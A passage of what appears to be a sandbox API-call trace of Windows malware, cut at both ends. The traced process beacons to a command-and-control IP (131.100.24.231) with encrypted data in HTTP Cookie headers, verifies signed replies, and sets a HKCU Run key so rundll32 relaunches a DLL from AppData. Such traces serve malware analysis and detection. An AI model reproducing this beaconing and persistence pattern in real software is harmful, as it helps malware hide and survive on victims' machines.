out: hHeap=0x530000) returned 1 [0373.545] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0373.578] GetProcessHeap () returned 0x530000 [0373.578] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0373.578] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0373.580] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="TstxALIFdZSCBbRVhJ", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0373.580] GetProcessHeap () returned 0x530000 [0373.580] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0373.580] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0373.580] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0373.580] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0373.580] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: RCZQeELm=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTn6mz3bw+IgpANfPBP7x1Dw8WcC1g1z8MflLARQ0y0Mhun2HMOdpWrVDTNjd3WexkXSXcTA=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0375.048] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0375.048] GetProcessHeap () returned 0x530000 [0375.048] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0375.048] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x1e3) returned 1 [0375.048] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47fe3, dwNumberOfBytesToRead=0xfe1d, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47fe3*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0375.048] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0375.048] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0375.048] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0375.048] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0375.049] GetProcessHeap () returned 0x530000 [0375.049] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0375.049] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0375.049] GetProcessHeap () returned 0x530000 [0375.049] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0375.049] GetProcessHeap () returned 0x530000 [0375.049] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0375.049] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0375.049] GetProcessHeap () returned 0x530000 [0375.049] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0375.049] GetProcessHeap () returned 0x530000 [0375.050] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0375.050] GetProcessHeap () returned 0x530000 [0375.050] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63008 [0375.050] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0375.050] GetProcessHeap () returned 0x530000 [0375.051] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63008 | out: hHeap=0x530000) returned 1 [0375.051] GetProcessHeap () returned 0x530000 [0375.051] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0375.051] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0375.051] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0375.051] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0375.051] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0375.051] GetProcessHeap () returned 0x530000 [0375.051] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0375.051] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0375.051] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0375.053] GetProcessHeap () returned 0x530000 [0375.053] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c640 [0375.053] GetProcessHeap () returned 0x530000 [0375.053] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0375.053] GetProcessHeap () returned 0x530000 [0375.054] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0375.054] GetProcessHeap () returned 0x530000 [0375.054] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2996d60 | out: hHeap=0x530000) returned 1 [0375.054] GetProcessHeap () returned 0x530000 [0375.055] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0375.055] GetProcessHeap () returned 0x530000 [0375.055] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0375.055] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0375.055] GetProcessHeap () returned 0x530000 [0375.055] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a838e0 [0375.055] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",VOdWMKiEvVgxL") returned 103 [0375.055] GetProcessHeap () returned 0x530000 [0375.055] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a838e0 | out: hHeap=0x530000) returned 1 [0375.055] GetProcessHeap () returned 0x530000 [0375.055] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0375.055] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x658, lpdwDisposition=0x0) returned 0x0 [0375.056] GetProcessHeap () returned 0x530000 [0375.056] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0375.056] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",VOdWMKiEvVgxL") returned 103 [0375.056] RegSetValueExW (in: hKey=0x658, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",VOdWMKiEvVgxL", cbData=0xd0 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",VOdWMKiEvVgxL") returned 0x0 [0375.057] RegCloseKey (hKey=0x658) returned 0x0 [0375.057] GetProcessHeap () returned 0x530000 [0375.057] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c640 | out: hHeap=0x530000) returned 1 [0375.057] GetProcessHeap () returned 0x530000 [0375.057] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0375.057] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe22e3) returned 0x102 [0385.060] GetProcessHeap () returned 0x530000 [0385.060] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0385.060] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0385.060] GetProcessHeap () returned 0x530000 [0385.060] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0385.060] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0385.060] GetProcessHeap () returned 0x530000 [0385.060] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0385.060] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0385.060] GetProcessHeap () returned 0x530000 [0385.060] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0385.060] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a838e0 [0385.062] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0385.062] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0385.062] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0385.062] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0385.062] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0385.062] FindClose (in: hFindFile=0x2a838e0 | out: hFindFile=0x2a838e0) returned 1 [0385.063] GetProcessHeap () returned 0x530000 [0385.063] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0385.063] GetProcessHeap () returned 0x530000 [0385.063] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0385.063] GetProcessHeap () returned 0x530000 [0385.063] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0385.063] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0385.064] GetProcessHeap () returned 0x530000 [0385.064] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0385.064] GetProcessHeap () returned 0x530000 [0385.064] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0385.064] GetProcessHeap () returned 0x530000 [0385.064] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63008 [0385.064] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0385.064] GetProcessHeap () returned 0x530000 [0385.065] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63008 | out: hHeap=0x530000) returned 1 [0385.065] GetProcessHeap () returned 0x530000 [0385.065] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0385.065] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0385.065] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0385.065] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0385.065] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0385.065] GetProcessHeap () returned 0x530000 [0385.065] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0385.065] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0385.065] GetProcessHeap () returned 0x530000 [0385.065] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bdf8 [0385.065] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0385.065] GetProcessHeap () returned 0x530000 [0385.065] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0385.065] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bdf8, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0385.065] GetProcessHeap () returned 0x530000 [0385.065] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe8) returned 0x2b59e28 [0385.066] GetProcessHeap () returned 0x530000 [0385.066] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0385.066] GetProcessHeap () returned 0x530000 [0385.066] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0385.066] CryptBinaryToStringW (in: pbBinary=0x2b59e28, cbBinary=0xe8, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0385.066] GetProcessHeap () returned 0x530000 [0385.066] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x272) returned 0x2b65430 [0385.066] CryptBinaryToStringW (in: pbBinary=0x2b59e28, cbBinary=0xe8, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTls5EusAt5r3la/OaTzs7G0wCXMIA0s4Nq43q++Oh0hFOSgi+31zybkhRNZ4t26OfsPF+0W0t+Ykg1QIx0XtJafPWoDqvl2Qrw==", pcchString=0x2cf504) returned 1 [0385.066] GetProcessHeap () returned 0x530000 [0385.066] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0385.066] GetProcessHeap () returned 0x530000 [0385.066] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f40 [0385.066] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: B=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTls5EusAt5r3la/OaTzs7G0wCXMIA0s4Nq43q++Oh0hFOSgi+31zybkhRNZ4t26OfsPF+0W0t+Ykg1QIx0XtJafPWoDqvl2Qrw==\r\n") returned 324 [0385.067] GetProcessHeap () returned 0x530000 [0385.067] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f40 | out: hHeap=0x530000) returned 1 [0385.067] GetProcessHeap () returned 0x530000 [0385.067] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0385.067] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0385.067] GetProcessHeap () returned 0x530000 [0385.067] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0385.067] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0385.069] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="xdohqFznFrXzjvxKGDoJkJqvmiXGarZxxdHusoAojxyf", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0385.069] GetProcessHeap () returned 0x530000 [0385.069] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0385.069] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0385.069] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0385.069] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0385.069] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: B=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTls5EusAt5r3la/OaTzs7G0wCXMIA0s4Nq43q++Oh0hFOSgi+31zybkhRNZ4t26OfsPF+0W0t+Ykg1QIx0XtJafPWoDqvl2Qrw==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0386.264] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0386.264] GetProcessHeap () returned 0x530000 [0386.264] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0386.264] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x3e6) returned 1 [0386.265] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b481e6, dwNumberOfBytesToRead=0xfc1a, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b481e6*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0386.265] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0386.265] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0386.265] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0386.265] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0386.265] GetProcessHeap () returned 0x530000 [0386.265] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0386.265] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf51c) returned 0x0 [0386.265] GetProcessHeap () returned 0x530000 [0386.265] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0386.265] GetProcessHeap () returned 0x530000 [0386.265] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ccb08 [0386.265] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0386.266] GetProcessHeap () returned 0x530000 [0386.266] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0386.266] GetProcessHeap () returned 0x530000 [0386.266] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ccb08 | out: hHeap=0x530000) returned 1 [0386.266] GetProcessHeap () returned 0x530000 [0386.266] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0386.267] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0386.267] GetProcessHeap () returned 0x530000 [0386.267] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0386.267] GetProcessHeap () returned 0x530000 [0386.267] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0386.267] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0386.267] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58be40, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0386.267] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0386.267] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0386.267] GetProcessHeap () returned 0x530000 [0386.267] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0386.267] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0386.267] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bdfc, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0386.269] GetProcessHeap () returned 0x530000 [0386.270] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c710 [0386.270] 